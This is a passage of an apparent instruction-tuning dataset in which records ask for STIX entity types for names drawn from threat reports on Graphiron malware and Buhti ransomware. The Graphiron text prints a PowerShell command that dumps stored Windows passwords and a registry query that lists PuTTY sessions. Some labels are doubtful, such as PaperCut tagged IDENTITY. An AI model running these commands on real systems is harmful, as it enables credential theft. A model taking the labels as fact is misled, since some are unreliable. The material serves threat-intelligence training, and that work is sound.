"input": "### Entity:\nreshacker\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nollydbg\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBuhti\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBlacktail\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nThreat Hunter Team\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nLinux\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nLockBit\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPaperCut\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
